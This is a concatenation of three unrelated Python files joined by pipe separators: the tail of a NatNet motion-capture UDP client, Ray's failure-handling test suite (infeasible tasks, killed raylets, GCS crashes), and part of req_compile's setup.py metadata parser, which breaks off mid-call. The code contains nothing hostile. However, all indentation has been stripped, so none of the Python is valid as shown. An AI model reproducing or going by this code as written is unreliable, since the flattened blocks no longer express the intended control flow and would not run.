pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
size = FloatValue.unpack(data[offset:offset + 4])
offset += 4
# Version 2.6 and later
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 6) \
or self.__nat_net_stream_version[0] > 2:
param, = struct.unpack('h', data[offset:offset + 2])
offset += 2
occluded = (param & 0x01) != 0
point_cloud_solved = (param & 0x02) != 0
model_solved = (param & 0x04) != 0
# Version 3.0 and later
if self.__nat_net_stream_version[0] >= 3:
residual, = FloatValue.unpack(data[offset:offset + 4])
offset += 4
trace("Residual:", residual)
# TODO: false parsing BME MotionLab : if False
# Force Plate data (version 2.9 and later)
if False and (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 9) \
or self.__nat_net_stream_version[0] > 2:
force_plate_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Force Plate Count:", force_plate_count)
for i in range(0, force_plate_count):
# ID
force_plate_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Force Plate", i, ":", force_plate_id)
# Channel Count
force_plate_channel_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
# Channel Data
for j in range(0, force_plate_channel_count):
trace("\tChannel", j, ":", force_plate_id)
force_plate_channel_frame_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for k in range(0, force_plate_channel_frame_count):
force_plate_channel_val = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\t\t", force_plate_channel_val)
# Device data (version 2.11 and later)
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 11) \
or self.__nat_net_stream_version[0] > 2:
device_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Device Count:", device_count)
for i in range(0, device_count):
# ID
device_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Device", i, ":", device_id)
# Channel Count
device_channel_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
# Channel Data
for j in range(0, device_channel_count):
trace("\tChannel", j, ":", device_id)
device_channel_frame_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for k in range(0, device_channel_frame_count):
device_channel_val = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\t\t", device_channel_val)
# time_code
time_code = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
time_code_sub = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
# Timestamp (increased to double precision in 2.7 and later)
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 7) \
or self.__nat_net_stream_version[0] > 2:
timestamp, = DoubleValue.unpack(data[offset:offset + 8])
offset += 8
else:
timestamp, = FloatValue.unpack(data[offset:offset + 4])
offset += 4
# Hires Timestamp (Version 3.0 and later)
if self.__nat_net_stream_version[0] >= 3:
stamp_camera_exposure = int.from_bytes(data[offset:offset + 8], byteorder='little')
offset += 8
stamp_data_received = int.from_bytes(data[offset:offset + 8], byteorder='little')
offset += 8
stamp_transmit = int.from_bytes(data[offset:offset + 8], byteorder='little')
offset += 8
# Frame parameters
param, = struct.unpack('h', data[offset:offset + 2])
is_recording = (param & 0x01) != 0
tracked_models_changed = (param & 0x02) != 0
offset += 2
# Send information to any listener.
if self.new_frame_listener is not None:
self.new_frame_listener(frame_number, marker_set_count, unlabeled_markers_count, rigid_body_count,
skeleton_count, labeled_marker_count, time_code, time_code_sub, timestamp,
is_recording, tracked_models_changed)
# Unpack a marker set description packet
def __unpack_marker_set_description(self, data):
offset = 0
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("Markerset Name:", name.decode('utf-8'))
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for i in range(0, marker_count):
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tMarker Name:", name.decode('utf-8'))
return offset
# Unpack a rigid body description packet
def __unpack_rigid_body_description(self, data):
offset = 0
# Version 2.0 or higher
if self.__nat_net_stream_version[0] >= 2:
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tRigidBody Name:", name.decode('utf-8'))
rigid_body_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
parent_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
timestamp = Vector3.unpack(data[offset:offset + 12])
offset += 12
# Version 3.0 and higher, rigid body marker information contained in description
if self.__nat_net_stream_version[0] >= 3 or self.__nat_net_stream_version[0] == 0:
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\tRigidBody Marker Count:", marker_count)
marker_count_range = range(0, marker_count)
for marker in marker_count_range:
marker_offset = Vector3.unpack(data[offset:offset + 12])
offset += 12
for marker in marker_count_range:
active_label = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
return offset
# Unpack a skeleton description packet
def __unpack_skeleton_description(self, data):
offset = 0
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tMarker Name:", name.decode('utf-8'))
skeleton_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
rigid_body_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for i in range(0, rigid_body_count):
offset += self.__unpack_rigid_body_description(data[offset:])
return offset
# Unpack a data description packet
def __unpack_data_descriptions(self, data):
offset = 0
dataset_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for i in range(0, dataset_count):
data_type = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
if data_type == 0:
offset += self.__unpack_marker_set_description(data[offset:])
elif data_type == 1:
offset += self.__unpack_rigid_body_description(data[offset:])
elif data_type == 2:
offset += self.__unpack_skeleton_description(data[offset:])
def __data_thread_function(self, socket):
while True:
# Block for input
data, addr = socket.recvfrom(32768) # 32k byte buffer size
if len(data) > 0:
self.__process_message(data)
def __process_message(self, data):
trace("Begin Packet\n------------\n")
message_id = int.from_bytes(data[0:2], byteorder='little')
trace("Message ID:", message_id)
packet_size = int.from_bytes(data[2:4], byteorder='little')
trace("Packet Size:", packet_size)
offset = 4
if message_id == self.NAT_FRAMEOFDATA:
self.__unpack_mocap_data(data[offset:])
elif message_id == self.NAT_MODELDEF:
self.__unpack_data_descriptions(data[offset:])
elif message_id == self.NAT_PINGRESPONSE:
offset += 256 # Skip the sending app's Name field
offset += 4 # Skip the sending app's Version info
self.__nat_net_stream_version = struct.unpack('BBBB', data[offset:offset + 4])
trace("NatNet Stream Version:", self.__nat_net_stream_version)
offset += 4
elif message_id == self.NAT_RESPONSE:
if packet_size == 4:
command_response = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
else:
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Command response:", message.decode('utf-8'))
elif message_id == self.NAT_UNRECOGNIZED_REQUEST:
trace("Received 'Unrecognized request' from server")
elif message_id == self.NAT_MESSAGESTRING:
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Received message from server:", message.decode('utf-8'))
else:
trace("ERROR: Unrecognized packet type")
trace("End Packet\n----------\n")
def send_command(self, command, command_str, command_socket, address=None):
if address is None:
address = (self.server_ip_address, self.command_port)
# Compose the message in our known message format
if command == self.NAT_REQUEST_MODELDEF or command == self.NAT_REQUEST_FRAMEOFDATA:
packet_size = 0
command_str = ""
elif command == self.NAT_REQUEST:
packet_size = len(command_str) + 1
elif command == self.NAT_PING:
command_str = "Ping"
packet_size = len(command_str) + 1
else:
packet_size = len(command_str) + 1
data = command.to_bytes(2, byteorder='little')
data += packet_size.to_bytes(2, byteorder='little')
data += command_str.encode('utf-8')
data += b'\0'
trace("Command:", data)
command_socket.sendto(data, address)
def run(self):
#TODO: not working with BME MoCap
# Create the command socket
self.command_socket = self.__create_command_socket()
if self.command_socket is None:
print("Could not open command channel")
exit
# Create a separate thread for receiving command packets
command_thread = Thread(target=self.__data_thread_function, args=(self.command_socket,))
command_thread.start()
# Request NatNet streaming version
self.send_command(self.NAT_PING, "", self.command_socket)
# Request model
self.send_command(self.NAT_REQUEST_MODELDEF, "", self.command_socket)
# Request frame of data
self.send_command(self.NAT_REQUEST_FRAMEOFDATA, "", self.command_socket)
# Create the data socket
self.data_socket = self.__create_data_socket(self.data_port)
if self.data_socket is None:
print("Could not open data channel")
exit
# Create a separate thread for receiving data packets
data_thread = Thread(target=self.__data_thread_function, args=(self.data_socket,))
data_thread.start()
if __name__ == '__main__':
# This is a callback function that gets connected to the NatNet client and called once per mocap frame.
def receive_new_frame(frame_number, marker_set_count, unlabeled_markers_count, rigid_body_count,
skeleton_count, labeled_marker_count, time_code, time_code_sub, timestamp,
is_recording, tracked_models_changed):
print("Received frame", frame_number)
# This is a callback function that gets connected to the NatNet client. It is called once per rigid body per frame
def receive_rigid_body_frame(id, position, rotation):
print("Received frame for rigid body", id)
# This will create a new NatNet client ()
streamingClient = NatNetClient("192.168.1.153", "192.168.1.30")
# Configure the streaming client to call our rigid body handler on the emulator to send data out.
streamingClient.new_frame_listener = receive_new_frame
streamingClient.rigid_body_listener = receive_rigid_body_frame
# Start up the streaming client now that the callbacks are set up.
# This will run perpetually, and operate on a separate thread.
streamingClient.run()
|
test_failure_2.py
|
import logging
import os
import signal
import sys
import threading
import time
import numpy as np
import pytest
import ray
from ray.experimental.internal_kv import _internal_kv_get
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray._private.utils
from ray.util.placement_group import placement_group
import ray.ray_constants as ray_constants
from ray.cluster_utils import cluster_not_supported
from ray._private.test_utils import (
init_error_pubsub, get_error_message, get_log_batch, Semaphore,
wait_for_condition, run_string_as_driver_nonblocking)
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
foo = Foo.remote()
print(foo)
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# Placement group cannot be made, but no warnings should occur.
total_cpus = ray.cluster_resources()["CPU"]
# Occupy one cpu by an actor
@ray.remote(num_cpus=1)
class A:
pass
a = A.remote()
print(a)
@ray.remote(num_cpus=total_cpus)
def g():
pass
pg = placement_group([{"CPU": total_cpus}], strategy="STRICT_PACK")
g.options(placement_group=pg).remote()
errors = get_error_message(
p, 1, ray_constants.INFEASIBLE_TASK_ERROR, timeout=5)
assert len(errors) == 0, errors
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
a = Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
del a
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
# NOTE: We should save actor, otherwise it will be out of scope.
actor_group1 = [Foo.remote() for _ in range(num_cpus * 10)]
assert len(actor_group1) == num_cpus * 10
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
actor_group2 = [Foo.remote() for _ in range(num_cpus * 3)]
assert len(actor_group2) == num_cpus * 3
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote(num_cpus=0.25)
def f():
time.sleep(1000)
return 1
@ray.remote(num_cpus=0.25)
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote(num_cpus=0.25)
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray._private.import_thread.logger.
# However, I didn't find a good way to capture the output for all loggers
# simultaneously.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_warning_for_dead_autoscaler(ray_start_regular, error_pubsub):
# Terminate the autoscaler process.
from ray.worker import _global_node
autoscaler_process = _global_node.all_processes[
ray_constants.PROCESS_TYPE_MONITOR][0].process
autoscaler_process.terminate()
# Confirm that we receive an autoscaler failure error.
errors = get_error_message(
error_pubsub, 1, ray_constants.MONITOR_DIED_ERROR, timeout=5)
assert len(errors) == 1
# Confirm that the autoscaler failure error is stored.
error = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
assert error is not None
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(object_ref)
thread.join()
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.xfail(cluster_not_supported, reason="cluster not supported")
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = ray_start_cluster
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_rpc_server_reconnect_timeout_s": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
# wait for 30 seconds, for the 1st batch of logs.
batches = get_log_batch(log_pubsub, 1, timeout=30)
assert len(batches) == 1
assert batches[0]["pid"] == "gcs_server", batches
def test_raylet_node_manager_server_failure(ray_start_cluster_head,
log_pubsub):
cluster = ray_start_cluster_head
redis_port = int(cluster.address.split(":")[1])
# Reuse redis port to make node manager grpc server fail to start.
with pytest.raises(Exception):
cluster.add_node(wait=False, node_manager_port=redis_port)
# wait for max 10 seconds.
def matcher(log_batch):
return log_batch["pid"] == "raylet" and any(
"Failed to start the grpc server." in line
for line in log_batch["lines"])
match = get_log_batch(log_pubsub, 1, timeout=10, matcher=matcher)
assert len(match) > 0
def test_gcs_server_crash_cluster(ray_start_cluster):
# Test the GCS server failures will crash the driver.
cluster = ray_start_cluster
GCS_RECONNECTION_TIMEOUT = 5
node = cluster.add_node(
num_cpus=0,
_system_config={
"gcs_rpc_server_reconnect_timeout_s": GCS_RECONNECTION_TIMEOUT
})
script = """
import ray
import time
ray.init(address="auto")
time.sleep(60)
"""
# Get gcs server pid to send a signal.
all_processes = node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
proc = run_string_as_driver_nonblocking(script)
# Wait long enough to start the driver.
time.sleep(5)
start = time.time()
print(gcs_server_pid)
os.kill(gcs_server_pid, signal.SIGKILL)
wait_for_condition(lambda: proc.poll() is None, timeout=10)
# Make sure the driver was exited within the timeout instead of hanging.
# * 2 for avoiding flakiness.
assert time.time() - start < GCS_RECONNECTION_TIMEOUT * 2
# Make sure all processes are cleaned up after GCS is crashed.
# Currently, not every process is fate shared with GCS.
# It seems like log monitor, ray client server, and Redis
# are not fate shared.
# TODO(sang): Fix it.
# wait_for_condition(lambda: not node.any_processes_alive())
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
source.py
|
# pylint: disable=exec-used
"""Parsing of metadata that comes from setup.py"""
from __future__ import print_function
import functools
import imp # pylint: disable=deprecated-module
import io
import logging
import os
import os.path
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import time
from contextlib import closing
from types import ModuleType
import pkg_resources
import setuptools # type: ignore
import six
from six import BytesIO, StringIO
from six.moves import configparser
from req_compile import utils
from req_compile.errors import MetadataError
from req_compile.filename import parse_source_filename
from ..containers import DistInfo, PkgResourcesDistInfo
from .dist_info import _fetch_from_wheel
from .extractor import NonExtractor
from .patch import begin_patch, end_patch, patch
LOG = logging.getLogger("req_compile.metadata.source")
WHEEL_TIMEOUT = float(os.getenv("REQ_COMPILE_WHEEL_TIMEOUT", "30.0"))
EGG_INFO_TIMEOUT = float(os.getenv("REQ_COMPILE_EGG_INFO_TIMEOUT", "15.0"))
FAILED_BUILDS = set()
THREADLOCAL = threading.local()
def find_in_archive(extractor, filename, max_depth=None):
if extractor.exists(filename):
return filename
for info_name in extractor.names():
if info_name.lower().endswith(filename) and (
max_depth is None or info_name.count("/") <= max_depth
):
if "/" not in filename and info_name.lower().rsplit("/")[-1] != filename:
continue
return info_name
return None
def _fetch_from_source(source_file, extractor_type, run_setup_py=True):
"""
Args:
source_file (str): Source file
extractor_type (type[Extractor]): Type of extractor to use
Returns:
"""
if not os.path.exists(source_file):
raise ValueError("Source file/path {} does not exist".format(source_file))
name, version = parse_source_filename(os.path.basename(source_file))
if source_file in FAILED_BUILDS:
raise MetadataError(name, version, Exception("Build has already failed before"))
extractor = extractor_type(source_file)
with closing(extractor):
if run_setup_py:
LOG.info("Attempting to fetch metadata from setup.py")
results = _fetch_from_setup_py(source_file, name, version, extractor)
if results is not None:
return results
else:
extractor.fake_root = None
LOG.warning(
"No metadata source could be found for the source dist %s", source_file
)
FAILED_BUILDS.add(source_file)
raise MetadataError(name, version, Exception("Invalid project distribution"))
def _fetch_from_setup_py(
source_file, name, version, extractor
): # pylint: disable=too-many-branches
"""Attempt a set of executions to obtain metadata from the setup.py without having to build
a wheel. First attempt without mocking __import__ at all. This means that projects
which import a package inside of themselves will not succeed, but all other simple
source distributions will. If this fails, allow mocking of __import__ to extract from
tar files and zip files. Imports will trigger files to be extracted and executed. If
this fails, due to true build prerequisites not being satisfied or the mocks being
insufficient, build the wheel and extract the metadata from it.
Args:
source_file (str): The source archive or directory
name (str): The project name. Use if it cannot be determined from the archive
extractor (Extractor): The extractor to use to obtain files from the archive
Returns:
(DistInfo) The resulting distribution metadata
"""
results = None
setattr(THREADLOCAL, "curdir", extractor.fake_root)
def _fake_chdir(new_dir):
if os.path.isabs(new_dir):
dir_test = os.path.relpath(new_dir, extractor.fake_root)
if dir_test != "." and dir_test.startswith("."):
raise ValueError(
"Cannot operate outside of setup dir ({})".format(dir_test)
)
elif new_dir == "..":
new_dir = "/".join(re.split(r"[/\\]", os.getcwd())[:-1])
setattr(THREADLOCAL, "curdir", os.path.abspath(new_dir))
def _fake_getcwd():
return getattr(THREADLOCAL, "curdir")
def _fake_abspath(path):
"""Return the absolute version of a path."""
if not os.path.isabs(path):
if six.PY2 and isinstance(
path, unicode # pylint: disable=undefined-variable
):
cwd = os.getcwdu() # pylint: disable=no-member
else:
cwd = os.getcwd()
path = cwd + "/" + path
return path
# fmt: off
patches = patch(
os, 'chdir', _fake_chdir,
os, 'getcwd', _fake_getcwd,
os, 'getcwdu', _fake_getcwd,
os.path, 'abspath', _fake_abspath,
)
# fmt: on
with patches:
setup_file = find_in_archive(extractor, "setup.py", max_depth=1)
if name == "setuptools":
LOG.debug("Not running setup.py for setuptools")
return None
if setup_file is None:
LOG.warning(
"Could not find a setup.py in %s", os.path.basename(source_file)
)
return None
try:
LOG.info("Parsing setup.py %s", setup_file)
results = _parse_setup_py(name, setup_file, extractor)
except (Exception, RuntimeError, ImportError): # pylint: disable=broad-except
LOG.warning("Failed to parse %s", name, exc_info=True)
if results is None:
results = _build_egg_info(name, extractor, setup_file)
if results is None or (results.name is None and results.version is None):
return None
if results.name is None:
results.name = name
if results.version is None or (version and results.version != version):
LOG.debug(
"Parsed version of %s did not match filename %s", results.version, version
)
results.version = version or utils.parse_version("0.0.0")
if not isinstance(extractor, NonExtractor) and utils.normalize_project_name(
results.name
) != utils.normalize_project_name(name):
LOG.warning("Name coming from setup.py does not match: %s", results.name)
results.name = name
return results
def _run_with_output(cmd, cwd=None, timeout=30.0):
"""Run a subprocess with a timeout and return the output. Similar check_output with a timeout
Args:
cmd (list[str]): Command line parts
cwd (str, optional): Current working directory to use
timeout (float, optional): The timeout to apply. After this timeout is exhausted, the
subprocess will be killed and an exception raise
Returns:
(str) The stdout and stderr of the process as ascii
Raises:
subprocess.CalledProcessError when the returncode is non-zero or the call times out. If the
call times out, the returncode will be set to -1
"""
proc = subprocess.Popen(
cmd,
cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
def shoveler(output, input_file):
for line in iter(lambda: input_file.read(1024), b""):
output.write(line)
stdout = BytesIO()
output_shoveler = threading.Thread(target=shoveler, args=(stdout, proc.stdout))
output_shoveler.start()
# Close the stdin pipe immediately to unhang anything attempting to read from stdin
proc.stdin.close()
start = time.time()
while proc.poll() is None and (time.time() - start) < timeout:
output_shoveler.join(0.25)
result = proc.poll()
if result is None or result != 0:
ex = subprocess.CalledProcessError(result if result is not None else -1, cmd)
try:
proc.terminate()
proc.kill()
proc.wait()
except EnvironmentError:
pass
output_shoveler.join()
ex.output = stdout.getvalue().decode("ascii", "ignore")
raise ex
output_shoveler.join()
return stdout.getvalue().decode("ascii", "ignore")
def _build_wheel(name, source_file):
"""Build a wheel from a downloaded source file and extract metadata from the wheel"""
results = None
LOG.info("Building wheel file for %s", source_file)
temp_wheeldir = tempfile.mkdtemp()
try:
_run_with_output(
[
sys.executable,
"-m",
"pip",
"wheel",
source_file,
"--no-deps",
"--wheel-dir",
temp_wheeldir,
],
timeout=WHEEL_TIMEOUT,
)
wheel_file = os.path.join(temp_wheeldir, os.listdir(temp_wheeldir)[0])
results = _fetch_from_wheel(wheel_file)
except subprocess.CalledProcessError as ex:
LOG.warning(
'Failed to build wheel for %s:\nThe command "%s" produced:\n%s',
name,
subprocess.list2cmdline(ex.cmd),
ex.output,
)
finally:
shutil.rmtree(temp_wheeldir)
return results
# Shim to wrap setup.py invocation with an import of setuptools
# This is what pip does to allow building wheels of older dists
SETUPTOOLS_SHIM = (
"import setuptools, tokenize;"
"__file__=%r;"
"f = getattr(tokenize, 'open', open)(__file__);"
"code = f.read().replace('\\r\\n', '\\n');"
"f.close();"
"exec(compile(code, __file__, 'exec'))"
)
def _build_egg_info(name, extractor, setup_file):
temp_tar = tempfile.mkdtemp()
extractor.extract(temp_tar)
extracted_setup_py = os.path.join(temp_tar, setup_file)
LOG.info("Building egg info for %s", extracted_setup_py)
try:
setup_dir = os.path.dirname(extracted_setup_py)
output = _run_with_output(
[
sys.executable,
"-c",
SETUPTOOLS_SHIM % extracted_setup_py,
"egg_info",
"--egg-base",
setup_dir,
